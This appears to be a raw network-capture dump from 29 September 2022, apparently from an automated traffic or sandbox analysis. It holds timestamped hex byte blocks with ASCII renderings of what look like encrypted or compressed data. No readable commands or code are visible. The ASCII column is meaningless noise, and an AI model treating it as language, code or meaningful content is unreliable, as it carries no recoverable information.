                                                                                                                                                2022-09-29 12:51:37 UTC14229INData Raw: ee 7a 9a 4b b6 b8 19 ff 17 38 b9 e6 bf 9b 73 ca 60 e6 08 55 e1 7b c6 8c 20 60 bd b6 a8 f6 9d f9 ef f2 de 47 8b 5b 74 de d8 81 0b 2e 1f 88 46 f5 34 a4 48 52 a9 e3 88 2d 3b 47 8e c1 6e 73 81 8c cd ca 33 73 60 e5 68 0b 14 54 9b a0 b4 b6 f4 49 e8 77 59 af 59 9b 90 96 11 37 f7 2c aa 6f 63 a7 64 77 19 e6 12 df 46 e4 24 d2 db 6b 60 cb 96 b5 3a 48 43 bb 8e d7 59 a5 0f a5 15 ba ec 5a 25 61 01 a3 6f 7d c9 5d ff 8b 33 af d1 12 d2 cd 05 0a e6 e9 d7 62 ad 72 1b 0f c8 0f 7e 43 1e 31 54 c4 7a 08 35 a0 38 60 a8 9d fb f8 81 0f 7b e0 c0 30 d0 cb 02 14 a0 2b ed a7 db 87 23 cd fa 74 3a 52 87 98 66 37 0a e1 02 04 4d a5 9b 09 48 67 3d ab 0e 68 8d 3e 7f f6 54 b3 23 c6 9f ec 74 8f 54 9e 34 63 af 4e 37 cb 90 4b 4e 80 f0 4b 41 a5 8d 50 c6 a9 9d 2f 8f 32 11 21 64 2a 91 3f c2 90 1b
                                                                                                                                                Data Ascii: zK8s`U{ `G[t.F4HR-;Gns3s`hTIwYY7,ocdwF$k`:HCYZ%ao}]3br~C1Tz58`{0+#t:Rf7MHg=h>T#tT4cN7KNKAP/2!d*?
                                                                                                                                                2022-09-29 12:51:37 UTC14245INData Raw: 48 b1 21 21 2c 8f d0 1b 31 24 7d 28 02 1f e3 ac 9f 79 c1 9e 38 e6 24 03 1f 34 57 82 e2 e5 6b c9 45 bd d0 34 da 2e 80 95 a6 bb fd 8b 37 55 d4 2e 6f b3 50 fa b5 78 0f cc e4 a3 29 f3 68 1f 9b 0e 04 42 ac 44 83 35 f6 eb 7c 66 e7 d1 f4 13 07 4b 0a 7f e5 ed 38 16 42 a6 76 e1 d6 15 c3 5e 3b b9 91 85 81 c6 a8 92 2f d7 b1 83 5d 6c 2d 9b ca 5e 4c 86 7d 88 41 10 e2 e2 f4 04 08 f1 64 06 ba 32 33 b4 a6 81 ec a0 9f ad 9e 38 0d 5e 22 cf a4 c2 29 c5 ed c2 f8 ed aa 78 ee 79 51 7c bd 75 e0 62 01 53 e3 83 ed 1f 86 04 4a e0 ee 9f e9 bd b9 ed f5 9f cf 68 c5 b4 ca 40 15 d8 b5 27 06 65 bb bd 46 18 1a ff 14 cb ab a2 49 2e 23 63 89 20 9d fa 51 02 2e 08 51 33 a5 bb 58 b8 81 ce 66 54 1d 74 9c 99 a0 51 b1 a0 3f 98 24 a9 31 a7 0f f7 c8 f7 7a 2d ac 6a fb 9b f6 5c 7f 0f 7e e2 71 01 d0
                                                                                                                                                Data Ascii: H!!,1$}(y8$4WkE4.7U.oPx)hBD5|fK8Bv^;/]l-^L}Ad238^")xyQ|ubSJh@'eFI.#c Q.Q3XfTtQ?$1z-j\~q
                                                                                                                                                2022-09-29 12:51:37 UTC14261INData Raw: 36 2c 8d 76 ad d2 bd 8f cd b7 cb fd 2d 23 c1 c5 c3 bc e5 d4 b4 f4 1f b2 56 4d 7d c4 ae f4 b9 5a 39 d7 af 81 bc 77 90 39 24 c2 e4 1d cb ea a7 b1 65 58 8d b7 6a 72 e9 f5 3d c1 7b 14 40 90 14 75 a8 c0 b2 04 ac 33 cc 66 05 3e 81 68 28 4b ea 9c 41 f3 9d 7d c5 90 14 f7 fc 30 1e eb d4 32 ac 6b d2 fb 09 a4 a0 4b 37 53 7e b7 9e a1 0c ed 2c b1 74 0d 7c c2 0f ab fe 3c bd 83 a5 cd 21 c6 d7 5e c1 0f 1b 7b 0f eb a4 09 c6 cd d5 46 16 12 84 47 99 ac f0 3f 9a 8e a6 6e 33 24 5a 5e 37 72 a1 28 9c e3 90 c9 e8 5e 23 28 8c e4 af b0 55 03 d4 87 54 73 54 34 cd 53 b1 3f 77 f8 06 c6 89 08 5a 85 7c ab 58 48 3d b8 05 46 32 43 94 f4 e4 09 c6 bd 5f 14 45 de 8e bd 23 bb 20 c9 63 47 d5 2c ca d5 a5 c1 47 18 b5 c6 76 e6 51 e3 b7 02 f0 c5 bb aa 58 f7 8f 1c bb 85 35 10 8d f6 1d e8 d3 40 f9
                                                                                                                                                Data Ascii: 6,v-#VM}Z9w9$eXjr={@u3f>h(KA}02kK7S~,t|<!^{FG?n3$Z^7r(^#(UTsT4S?wZ|XH=F2C_E# cG,GvQX5@
                                                                                                                                                2022-09-29 12:51:37 UTC14277INData Raw: 11 e6 a2 30 56 52 6a 50 f1 fe 4f ee 9a 69 0b 22 a9 34 0f 60 5e 77 3f 85 6b 8a 51 78 8c 55 52 76 53 93 b6 6c 43 40 3d fa a4 72 23 a5 e7 75 d0 6c 0c 32 ea 19 06 ad c3 32 16 63 b4 30 fc 4a 34 6d fa 8d 5e ea 3c 75 af 35 a2 48 2d 87 39 4e 45 e3 88 4d 5f b6 43 3e 47 69 1b b3 2b 65 e9 80 35 cb ea 73 72 6d 9f c5 9e d8 10 4d 6d 88 60 64 09 cb a7 f6 69 bc 9e 14 0e 22 9d 93 a0 1b 4a 58 67 0e b0 17 f4 f8 e6 11 ca 1f 7a d4 9e d9 49 59 19 62 6a f9 4a 4e 21 08 d4 13 4a 27 35 d6 76 2f 6a ba db 23 9c 0e e3 0d 1f 89 55 b1 e6 6e 08 18 8b 71 b4 32 cb b5 70 de d1 54 7c 5e ba ff 18 12 a0 50 74 e8 ac 0d 44 b2 55 d7 ab 8f fe 51 72 ec 0a df 22 e9 0c a5 de 47 4e f2 39 9c 4b f6 ca 77 87 fa 3e 2a 26 c8 44 b8 60 70 07 4c 34 63 b3 dd c7 95 15 fa 1a 41 c6 ca df aa 45 07 50 91 80 e0 20
                                                                                                                                                Data Ascii: 0VRjPOi"4`^w?kQxURvSlC@=r#ul22c0J4m^<u5H-9NEM_C>Gi+e5srmMm`di"JXgzIYbjJN!J'5v/j#Unq2pT|^PtDUQr"GN9Kw>*&D`pL4cAEP
                                                                                                                                                2022-09-29 12:51:37 UTC14293INData Raw: ec e8 31 fe ff 0e 18 41 a1 2c c5 db 2b da e5 fd 7d 29 d2 78 a3 54 32 5d 4b e9 65 79 48 0e bf 46 18 d2 ac a5 db 4f bd 07 00 da f5 a0 c9 e4 a1 4d ff b7 fa 74 d6 58 a9 cc b0 92 b0 b9 5b 3e 34 20 32 a2 a5 fb b0 e1 a7 31 dc 59 43 90 41 a0 6c bf e0 fc 8b 76 2e 91 13 69 fa f2 42 ad e1 5e 37 45 a2 a7 3a 60 1a db 1d 8d bf 53 8b c4 44 b9 15 ff b9 38 5f 65 fd 53 89 7e 24 a9 d2 ba 28 99 22 21 9f 6e 9c c6 a9 a1 82 4e 3f e9 2d 66 f3 5f ef 52 85 2d 1f 49 a8 21 5e 5a ed 2c e0 7f b1 df 85 53 33 22 13 4e c8 3f e6 f2 88 a6 54 e9 8b bd 3c 08 f9 c6 1e 9b e0 ee 3f 8c e5 f3 25 97 73 40 c0 f6 6d 87 41 dd 2e 78 5f ef 05 e9 b9 c7 73 14 4f 14 1c 81 17 09 e1 0b 09 c7 ec ce 72 ac 3a ab 83 5f 6b 96 e6 06 81 f0 d2 e8 f6 8f c1 74 72 64 a0 76 ce db df de 44 23 75 07 f5 fd 8c 62 2b d3 c8
                                                                                                                                                Data Ascii: 1A,+})xT2]KeyHFOMtX[>4 21YCAlv.iB^7E:`SD8_eS~$("!nN?-f_R-I!^Z,S3"N?T<?%s@mA.x_sOr:_ktrdvD#ub+
                                                                                                                                                2022-09-29 12:51:37 UTC14309INData Raw: b4 e9 7d e5 0e e7 08 1d 37 95 c1 28 e7 04 ae 5a c9 0c c1 db fc 02 0c 98 91 e6 ee 9a d0 95 f5 c6 23 52 73 b4 96 a7 f4 4e c6 06 cc c1 c6 62 82 35 76 94 d6 98 72 95 91 0a 3a e1 3d b1 5d ea a8 77 b1 97 e8 a1 db 70 97 79 cd ca 69 94 d5 ab 60 bd 29 aa 4c cd 37 00 53 ff 3c a8 5c b0 a1 87 34 23 2d 6c 70 f6 45 03 85 49 f5 9f 22 8f b4 25 4b f3 82 38 06 b7 37 46 cd 67 b8 4b 91 da 02 52 56 63 8d 8e 2b 08 66 27 87 25 47 8e df 5d 44 33 90 fa 1d 45 9b ac 00 fc 84 2d e1 4d 43 90 23 ef 6b 55 b4 72 06 ef c3 1d a3 23 52 5d 96 7c 21 d7 40 b2 6e b5 83 c6 0e 30 a2 8c db be 1b ae fb 13 8c 81 ef 8e 1b d9 e8 14 65 09 be 0d 2d 01 e9 68 c2 16 b3 a7 53 50 dc 1a b9 27 81 f5 33 2e 99 fe 12 9f 8a f6 63 f9 65 be cf ab 9d aa b6 d5 41 c4 9b 02 29 f3 91 b3 d3 7f ed 96 aa 22 2d 67 c3 64 84
                                                                                                                                                Data Ascii: }7(Z#RsNb5vr:=]wpyi`)L7S<\4#-lpEI"%K87FgKRVc+f'%G]D3E-MC#kUr#R]|!@n0e-hSP'3.ceA)"-gd
                                                                                                                                                2022-09-29 12:51:37 UTC14325INData Raw: 4a f0 65 5a b3 53 2b ac 28 0c a0 4d 5c 3a 1d b1 d0 bb 87 d2 61 37 ea 34 90 17 39 4b 48 27 2d 3e ff 55 f1 e5 14 81 4a e7 86 71 f6 77 66 05 25 2f 1a 7e 59 2c 0a ef 9f 83 33 03 00 34 c9 ff 53 d8 0b 0d 52 10 36 44 79 22 ee b8 a8 3c d1 ac 64 c6 50 d9 b7 8f 3d 6e 9f 90 05 0e 1e e7 4d a6 2a e3 8c 90 20 a9 4e 4a 3b 40 81 04 95 7a 3c dd 9d 36 f1 a9 2d 2f a1 df a4 96 99 6f 34 75 87 1f bd 84 b4 ea 44 35 05 ab d1 6d bf d3 f5 cb 41 5d a1 be 1c e4 de 1e 91 19 7f 1e eb 7a a4 15 cc 06 ae 7c eb 6e 82 7c e9 4b 76 68 ae 98 6c 47 37 40 a2 71 b8 89 92 8f dd 4c bd 97 af 0a fc ba fd 76 9d 55 77 73 53 91 7e f6 1d 9c f1 bd 64 6a b2 d5 9e 85 71 e5 3b 7e d1 26 64 ce 87 a8 5e f8 49 ff e3 2d a7 cf 2e 7c 48 fe e8 24 0c e1 f6 8a 39 c6 12 ed ae b1 27 13 5b 51 77 b4 cd 36 29 85 96 a4 b5
                                                                                                                                                Data Ascii: JeZS+(M\:a749KH'->UJqwf%/~Y,34SR6Dy"<dP=nM* NJ;@z<6-/o4uD5mA]z|n|KvhlG7@qLvUwsS~djq;~&d^I-.|H$9'[Qw6)
                                                                                                                                                2022-09-29 12:51:37 UTC14341INData Raw: 23 fe 0a d1 6e 1b 15 86 d9 be f4 cb 30 d3 2b f5 5b 3c f6 b4 dd 53 31 ae b1 b2 68 c4 59 e3 0e fb 99 21 d8 52 00 32 33 b7 ab b1 f3 26 44 50 95 f5 30 e6 6f 87 9d 79 38 b3 33 f3 47 40 0d 42 c8 17 ef 54 35 09 7a b6 bc 27 82 7c d6 72 8a 9f 06 35 9e 0a d5 c0 4b 1d 84 2e 5d 28 9d 95 13 e8 7d ec 3e 23 55 0e b5 4d 97 fd 17 22 2e 88 14 2b 03 77 02 14 b2 86 f0 4f e5 7d 04 af e4 f2 60 ec a6 5a ef 62 ce 30 93 a9 a8 60 85 77 eb 66 e0 5b ab 4e f2 03 68 57 55 03 c1 e3 61 9f 34 79 11 04 76 aa d1 c8 af 14 69 3b f5 34 61 31 52 da d8 52 cf b0 3a 5d a8 04 65 ef b1 e1 b3 dd 02 45 c2 04 e8 82 51 28 b9 dd 44 b5 c2 40 d6 38 a8 64 e2 24 e8 81 70 6a b9 62 04 93 9c 2e b0 0b 8c 69 81 8e 6a ee b9 d5 51 99 d6 a5 2f de 5e eb bc 1c 11 a4 2d d2 4e bd aa e7 ad 6b 94 6d 5f 8e 57 72 96 f2 e5
                                                                                                                                                Data Ascii: #n0+[<S1hY!R23&DP0oy83G@BT5z'|r5K.](}>#UM".+wO}`Zb0`wf[NhWUa4yvi;4a1RR:]eEQ(D@8d$pjb.ijQ/^-Nkm_Wr
                                                                                                                                                2022-09-29 12:51:37 UTC14357INData Raw: cc 7f 3b 71 62 b0 e4 c8 0b 5e 2d 57 e4 ba bf 05 7d e6 34 50 2e d1 89 4b c5 9b f0 52 95 c3 b7 95 cd 5a 10 61 58 49 da b0 43 bd 6c 11 46 ae 5f eb ea 88 d2 4c 16 55 90 cf cf 65 5b 99 d9 81 80 d2 43 d2 ed 5c 1d 7e a1 cf 53 38 dc 09 1d e7 08 9a 3e 08 67 57 3e c5 62 3d a1 53 a9 86 bc b2 91 70 e0 b9 55 18 1e 3b dd f8 ac d4 a6 cf 27 05 fe 4a 05 7c 88 ba b9 de 11 ce c2 c8 6e 26 83 17 6e a6 9c 79 ee 8e 89 e5 7f 60 96 2e 80 f4 b7 13 9d 66 95 46 b9 68 31 c9 54 ad c4 69 ad 43 7b 38 1b 65 27 ed ab 42 75 c0 45 b0 d6 dd de df 20 18 87 41 d5 88 df e9 89 70 5e f7 a3 ec 51 c5 3c 39 ab b8 3c 19 5c 83 4b 74 8e c0 0f 04 56 60 f2 51 97 9c cf 91 8b a4 bd 3c 30 57 90 bd eb 50 fd 50 a1 de c0 42 10 f4 aa 6a 78 b8 c0 5b 3a e2 80 54 b2 e0 15 e4 b4 77 7f 05 6b 87 d6 1d 19 90 ec 3e 54
                                                                                                                                                Data Ascii: ;qb^-W}4P.KRZaXIClF_LUe[C\~S8>gW>b=SpU;'J|n&ny`.fFh1TiC{8e'BuE Ap^Q<9<\KtV`Q<0WPPBjx[:Twk>T
                                                                                                                                                2022-09-29 12:51:37 UTC14373INData Raw: b1 3f 3e c3 5c 61 23 90 f6 4a 60 9a 43 25 04 51 a3 96 2d 95 e6 aa 54 cf 71 ba 95 26 b3 68 eb f7 70 88 40 32 2d 6d ef 7c 09 58 49 f7 f6 08 98 60 f1 9d ca ce e0 b8 dc 5e f5 c1 f6 7b 86 d8 b2 8d d5 84 aa ab f5 03 69 1e 23 42 f9 e9 b4 cb ea a1 ab 12 c3 e5 d9 bd dd 6e 2e a2 1b 19 f7 e5 01 28 21 b0 f1 a1 10 84 4a d0 a2 29 62 54 1f 4f 80 68 b2 be 64 bb db 82 77 e6 2b 6a 22 85 7b 65 5f de f5 a1 81 dc eb e6 ff 52 f4 63 4e 42 6e 16 ab 33 bf ac aa 54 1e ba 99 58 e1 65 91 8e 8f 9a 05 11 92 e4 7e 29 24 d6 37 8b 13 23 f1 35 d3 a7 16 a7 c4 a4 54 b4 ee 44 63 3a 33 bd f6 c8 f3 dc 33 90 1f 80 8b 64 69 ae 1c c2 00 81 89 58 7f 8b d5 df 9b b0 13 d0 30 76 6d 68 22 b0 bb cb 4d 39 97 07 5e 02 8b 4d c0 03 8e 75 6a 95 c8 c3 d1 00 7d 56 7e e8 11 10 be 1d 62 4c af e7 f5 c7 8c ef db
                                                                                                                                                Data Ascii: ?>\a#J`C%Q-Tq&hp@2-m|XI`^{i#Bn.(!J)bTOhdw+j"{e_RcNBn3TXe~)$7#5TDc:33diX0vmh"M9^Muj}V~bL
                                                                                                                                                2022-09-29 12:51:37 UTC14389INData Raw: e5 25 19 0d 59 34 40 52 13 4c 72 4f 4f 80 18 4f e9 23 90 4f 95 57 40 ea 32 eb 02 15 2d ca d3 ca ab 8d a1 24 2c 5c 83 54 fb b1 10 05 21 84 4c f5 46 b1 ae 7e 88 17 d5 4e 01 07 0e de f8 d6 0e 24 20 ef 3c 0d c8 d3 2d 42 18 17 e5 8e 2a 5e 4a 7f ed f8 6e 9f 82 da 85 b1 a2 48 91 08 14 ee d6 d7 b4 ff 9c 06 68 1b 98 3b 14 c1 03 ff c3 ab e9 57 c9 13 2d 68 cc ec b7 1e df 0f 75 98 30 8f f4 7c 64 97 04 ef 09 0b 4c cd 4a 53 dd d3 b6 8b c8 55 c6 e0 b4 f9 74 f7 ed c6 d4 7a 3d 98 d0 18 57 ce 6a 08 31 e5 f2 34 f9 48 64 e1 fc e5 d8 c5 d7 84 9d e2 c1 5d da f8 44 89 ae 4f dd 22 51 1e c9 71 5e 8f be dc e3 94 92 bd 30 51 a9 87 29 8d b4 2f fb 11 35 cb 4b 6c 0b 42 82 1a 0d dc a8 01 8d 12 40 44 f8 1e 64 1b 3a 7e 9a 92 d9 4a a5 61 2d f1 a9 4c b1 35 37 93 62 87 9e 9d 63 f7 33 f4 c3
                                                                                                                                                Data Ascii: %Y4@RLrOOO#OW@2-$,\T!LF~N$ <-B*^JnHh;W-hu0|dLJSUtz=Wj14Hd]DO"Qq^0Q)/5KlB@Dd:~Ja-L57bc3
                                                                                                                                                2022-09-29 12:51:37 UTC14405INData Raw: 04 c0 f4 18 e9 3b 61 be bc 13 6e e6 64 c0 3d 91 15 2a 7a 18 ef 15 6d f9 92 52 0d 11 91 b4 c9 1a c8 71 2a d1 64 44 f4 a9 55 46 d0 d5 0b 7b e6 87 d0 11 b8 37 af a9 f8 18 46 f8 dd 62 41 8a 09 92 a8 87 4c 43 f1 e7 7c 13 5d 81 1b 0b 33 a2 cb 6c 01 29 22 64 aa b6 bf 5b 40 13 df d8 b2 6e 34 db 47 b8 76 13 a0 37 c9 71 71 b1 5a 86 e1 ee 69 4f 09 0f 01 55 0a 29 e9 2f d5 a9 98 ba 00 ea 10 c7 2e 30 1c 87 ad fb 8f a5 1c 96 03 2a ce 84 5d 2c 78 09 b9 30 33 fe d7 a3 bb f8 04 34 af a9 87 07 e1 e4 4b 93 d4 88 db e3 63 52 5a 63 a1 95 3c ee 9a 6d 87 0a 58 4a 43 60 b6 4a 9b 0e fe fb 9c 08 58 be bf 36 d4 22 1b 7a 8e cb a2 af 25 2c a3 2b ec 1f da 1c 81 92 38 82 56 7d 14 28 55 da 70 54 f9 37 5a 7e 00 f8 30 c1 f2 da 31 56 ab 0a a3 41 3d 61 94 29 11 7b 10 ea 0e ce 46 43 71 5c 34
                                                                                                                                                Data Ascii: ;and=*zmRq*dDUF{7FbALC|]3l)"d[@n4Gv7qqZiOU)/.0*],x034KcRZc<mXJC`JX6"z%,+8V}(UpT7Z~01VA=a){FCq\4
                                                                                                                                                2022-09-29 12:51:37 UTC14421INData Raw: 1e e6 04 79 52 85 4d c8 98 66 e6 67 ae cd 6d 39 e7 50 30 98 e9 7a 75 2a 73 e7 40 c7 31 0b cd 65 f6 9a dc 7d c1 f9 1d 61 23 95 44 88 19 9b a3 2c 03 c8 6f 7b f5 83 bf e4 c8 66 ea 94 f8 69 26 bd 51 09 66 e3 c2 40 7d b0 99 7f 31 05 e7 bd 6c 28 86 c9 2c 77 b3 03 bc 3d cf 71 c5 1f 03 1d 26 43 03 e9 13 22 af 6a a8 47 4c 37 53 1a 55 db 7a e3 5b 4b da 44 4d 31 22 cf fc 4d 2d ac 94 ae 10 38 64 d7 a0 c7 c8 22 bb 9d e8 3f 76 29 ef e6 c6 29 ec d0 fd db 32 a0 d8 16 a9 e8 9a 8d 03 41 2b aa db c4 18 a4 3e 82 8e 44 c1 a5 61 53 9a e3 3b 81 41 23 2e c9 81 cf b9 8f 9f 9c 79 5d 94 6f fa 98 de 07 2c a4 9c fe 8f b7 83 a0 b7 44 85 a1 65 0a 1d fd 75 ce 0d ec 04 eb 97 70 83 ad 3b 5b 00 16 f1 04 f5 b5 0e f6 b8 47 53 83 69 78 f8 88 0c 27 fa 94 b9 4e 78 95 06 e5 2d 91 63 ce 01 f3 90
                                                                                                                                                Data Ascii: yRMfgm9P0zu*s@1e}a#D,o{fi&Qf@}1l(,w=q&C"jGL7SUz[KDM1"M-8d"?v))2A+>DaS;A#.y]o,Deup;[GSix'Nx-c
                                                                                                                                                2022-09-29 12:51:37 UTC14437INData Raw: e5 d4 16 cb e3 d0 03 cb c6 a1 8c f7 2a b9 36 52 de 5e 05 96 45 e4 16 0d c1 9a fd 0b 6e 07 f3 04 1e 2e 59 ca c1 67 06 aa 8d a1 9e f9 c5 62 50 d3 d8 95 3a 11 a2 0d 1d 92 c2 d8 5e 36 f9 ee dc 66 1c 67 cb c4 0d b1 53 44 fd a5 fe 3f aa f7 75 c4 3b cf 4b 1e 77 e4 d5 8a c2 dc 18 6b c1 38 62 66 00 55 45 47 5e 37 7d b5 52 b0 65 3c 33 f5 5a 82 f3 9e 78 17 4a 65 dd 52 11 15 50 9c 4e f9 13 c2 d8 c0 c8 9f 1f de 78 27 3c 93 0c 97 1f 85 40 bb 1c b1 e0 28 e0 72 69 c8 17 00 31 d6 04 dd 1d 15 50 a2 38 78 f6 d5 ae 4a 43 d2 6a e3 17 b3 ba 61 56 fe 9a 61 5e 0d 36 13 e1 60 38 a5 29 3e 25 ad 8f 75 8c 07 ee 11 8d 7e 81 3a 24 46 83 d7 97 7e 69 a1 eb 20 ac 1b f1 8a 92 d8 ec e7 49 db 5e b4 48 ec 7d 70 c9 5e ad 00 27 28 9c 93 46 f5 f3 b2 c6 30 9f f7 58 62 c8 b2 75 b7 90 86 ec ed 14
                                                                                                                                                Data Ascii: *6R^En.YgbP:^6fgSD?u;Kwk8bfUEG^7}Re<3ZxJeRPNx'<@(ri1P8xJCjaVa^6`8)>%u~:$F~i I^H}p^'(F0Xbu
                                                                                                                                                2022-09-29 12:51:37 UTC14453INData Raw: 1c 1a c9 b3 5f ee 7e a1 aa bb f7 27 c9 ec 9e 09 2c 57 3f a7 59 5d fa 1c 91 34 9a 0c 04 b2 ef b4 1c 2e 08 a1 4f 73 fb 6e 6f d4 4f e2 fe 5c 91 6f ae b7 ed f8 ce 48 7d 4d 2e 14 23 59 5c 38 a1 70 5f b8 3d 49 22 ad 35 91 93 7e 4a f7 5e 23 68 cc c3 d6 4b 11 6d f5 33 68 0f 3e 6e 99 c4 bb af a5 be 7b 8e bc a7 b9 c9 d2 df 89 74 5c c4 2b 07 8a b1 ee a2 2b 80 85 bd ed 18 0a c7 29 92 97 ee e2 a4 98 f2 74 b5 80 47 e7 f9 a2 bc c6 fa ac 47 a3 95 c4 a4 e1 27 80 33 d6 a5 e2 72 76 1b f3 f9 ae 0e 1e 34 b0 b5 ca 6a 5e 0e 29 fa e1 3c be f6 d9 26 c5 2e f9 6f b3 d5 61 47 aa fe 16 67 b3 a3 d7 c0 a5 7f 9b 37 c2 18 09 98 19 28 09 8e d1 4b 6a 16 72 21 c9 69 c7 52 3c 76 86 55 2d 9a 3b da aa 0e 4f c1 d8 e0 0b a2 65 23 3c c8 23 51 0b 79 ed 29 ed 6d 23 6a 4f fa f2 57 cd cd f9 db 00 c6
                                                                                                                                                Data Ascii: _~',W?Y]4.OsnoO\oH}M.#Y\8p_=I"5~J^#hKm3h>n{t\++)tGG'3rv4j^)<&.oaGg7(Kjr!iR<vU-;Oe#<#Qy)m#jOW
                                                                                                                                                2022-09-29 12:51:37 UTC14464INData Raw: ae 01 07 d7 ea ba f2 88 12 1e ff 89 85 bc 52 ff 6e 3a 1c ab a5 db 47 65 48 27 2d 4b 8a b7 37 f5 b0 51 42 6b e6 c3 e6 b9 68 d7 f7 10 fe 5b ac bc 79 c5 1c 95 f1 5b 21 6b 55 06 30 b0 90 93 60 70 b9 64 2d c8 48 e5 fd 0e 87 be 68 ee 8c 61 b3 53 c9 52 f4 a0 3d 59 cc 6d 98 a4 64 b2 a8 ad f2 63 b9 b5 8b 5d a1 d9 3a e3 05 82 ca ff 09 3a b8 5f 9e 21 27 ba 16 bd c0 de 87 a5 16 7d 98 86 42 4b 75 80 93 18 cb 17 ef d6 8b 92 63 31 69 2b db 72 07 8d 01 1e 25 37 05 1a a5 24 03 da d2 ed bb 02 9c 2e 83 16 b7 4a d9 6f 1d e0 d0 21 e0 55 e3 fc cf 55 08 90 36 e4 ba 3b 1a 25 8f ac 54 0b 9d f0 b1 47 7f 6a 77 19 16 cc 9b 2d f2 9c 92 c7 d3 fe d3 60 5b 7e f7 6f c6 55 3e 66 28 46 36 43 46 39 ad e6 b5 af 36 25 a5 50 ae 25 b6 5e bc 68 49 93 57 75 64 69 9e 4b 96 0d 57 28 06 5a 57 83 34
                                                                                                                                                Data Ascii: Rn:GeH'-K7QBkh[y[!kU0`pd-HhaSR=Ymdc]::_!'}BKuc1i+r%7$.Jo!UU6;%TGjw-`[~oU>f(F6CF96%P%^hIWudiKW(ZW4
                                                                                                                                                2022-09-29 12:51:37 UTC14480INData Raw: 03 75 01 65 ad 99 8b a1 ed df a7 fa d6 93 6f 8e ed b5 e2 52 c4 47 6d 06 af 34 48 38 d9 4d 3c ce 02 54 f3 58 49 41 c4 ef e0 3f 7e 40 8a 21 73 0f 37 75 de 6c 2b 82 9a 40 2d 61 91 2a 1f 10 f2 81 cf f3 7f 59 96 ae ae 3a de 63 0a 1c 82 c5 1c 9b da 40 eb 09 f1 60 f1 9d 19 d0 e7 3e 95 68 e0 1c 50 72 5d 97 8f d3 09 dc 71 8c 6b 15 8a 65 26 e6 7c af 7e f0 68 3b cb db a3 2b 1f be f6 f5 f0 48 dd 47 91 0e 3c 86 ce 1c bc a8 67 ba 6c 3a de 60 fa de 1d 12 2e e8 d9 06 9a 53 0e 05 22 a1 c5 58 6f af 33 80 37 7d ee a1 60 36 05 38 fe f5 24 c5 53 76 d5 95 90 95 5e 90 33 25 7e 3f 74 59 6a 4e 71 13 7b 31 df 7c c5 0b e3 c3 c9 89 cf ef db e6 6d 44 f9 da 20 b1 fe 30 43 99 f5 0c da 73 4e 7d 68 e9 aa b6 e8 4c df 7f 4c f9 40 4e d6 41 ca 60 8a fa 14 73 4a 31 7b a4 66 5f 27 27 46 cd c9
                                                                                                                                                Data Ascii: ueoRGm4H8M<TXIA?~@!s7ul+@-a*Y:c@`>hPr]qke&|~h;+HG<gl:`.S"Xo37}`68$Sv^3%~?tYjNq{1|mD 0CsN}hLL@NA`sJ1{f_''F
                                                                                                                                                2022-09-29 12:51:37 UTC14496INData Raw: 66 d1 cc d7 24 cb 9f d2 46 4d 4d d1 99 8d db dd 7c 05 b9 23 c9 6f a0 48 9f 48 bb 4d 7b d5 c4 30 ea aa ab d2 d8 ca 5d 41 02 75 fb 8e 36 ee a9 c3 ab 3e 04 c5 c6 fa 1a b0 d4 96 53 c2 c5 b5 e7 08 6a 70 17 a2 d0 b6 3c a4 a1 1c a4 5d fa 44 02 dc ab e8 f1 19 c8 69 b7 b1 a4 dc 27 e3 49 fc 2c c0 4a a0 db 15 ba b3 47 b8 a9 12 84 c7 2f f1 4b 56 d6 b0 5c 76 4e ba d0 fb ff 83 4d 19 35 9b 50 87 6e 2c 5f d4 58 cf 64 57 4f 7a b1 fc 8b 67 c9 c8 6d e3 20 22 42 7a 39 01 e9 6c 81 0d 02 a2 a0 51 c0 be b7 87 2e b5 33 79 eb 10 2d 74 96 26 e7 65 c4 c5 e1 cf 22 f7 46 92 56 d4 53 80 2c 13 4f e5 2b d0 55 0c 62 bb 09 cc b8 5a bf 4d c0 a0 33 2a be 1a 52 6b 5c ce b5 bf 1a 2c 42 83 7a 94 56 8e 67 84 9f 14 dd f8 18 7e d7 d6 9c f3 7b 58 5b 7f b7 5f 10 11 07 9b 56 5f 3e 11 65 a9 05 97 7b
                                                                                                                                                Data Ascii: f$FMM|#oHHM{0]Au6>Sjp<]Di'I,JG/KV\vNM5Pn,_XdWOzgm "Bz9lQ.3y-t&e"FVS,O+UbZM3*Rk\,BzVg~{X[_V_>e{
                                                                                                                                                2022-09-29 12:51:37 UTC14512INData Raw: 41 6c 15 e8 7a 7b d7 e7 db 63 c9 cd 5d 22 05 c7 09 8b ce 4f 28 b3 67 c6 47 98 7f c9 65 56 e4 a5 51 51 c3 4a 59 9a 71 fe 23 06 af 9c 1f e0 59 48 8e ab 0a 90 9e 81 38 b9 5a 0b ab 35 47 a2 5d 2f ae fa b4 09 e1 0e a7 88 b1 6a dd 71 e3 46 af 32 c0 39 e8 41 81 6d 86 57 b6 f6 5e ba 9b 5a a7 d0 ba 4c 52 9f 30 76 e2 92 95 aa 8c d4 1a 96 42 db 5f bb 63 c4 b3 83 22 54 b9 38 56 2c 45 cf 96 ab 7b b4 19 4d 01 14 55 0c 35 0c 74 ce 50 86 5c 58 58 88 d1 f3 c4 0c 14 0a 9c 3e ca 8c 50 62 8e 43 ea 4b 0c 20 7e db b3 55 d6 a0 8a 88 16 bd 9e 22 9d 1f 5e 02 9f 6f 7a c1 f2 97 37 79 7e 67 36 53 bc e5 a9 fc ed c9 97 bc bb 5e 22 33 1e 18 45 a4 08 18 c9 24 db e1 db de 9e 87 a7 bf fe ca 44 45 f3 3b ef b6 6c cb 0a 0e c3 ff 98 42 89 23 86 48 b6 85 16 c0 82 73 2c 22 be a8 8b fa 8d 81 ca
                                                                                                                                                Data Ascii: Alz{c]"O(gGeVQQJYq#YH8Z5G]/jqF29AmW^ZLR0vB_c"T8V,E{MU5tP\XX>PbCK ~U"^oz7y~g6S^"3E$DE;lB#Hs,"
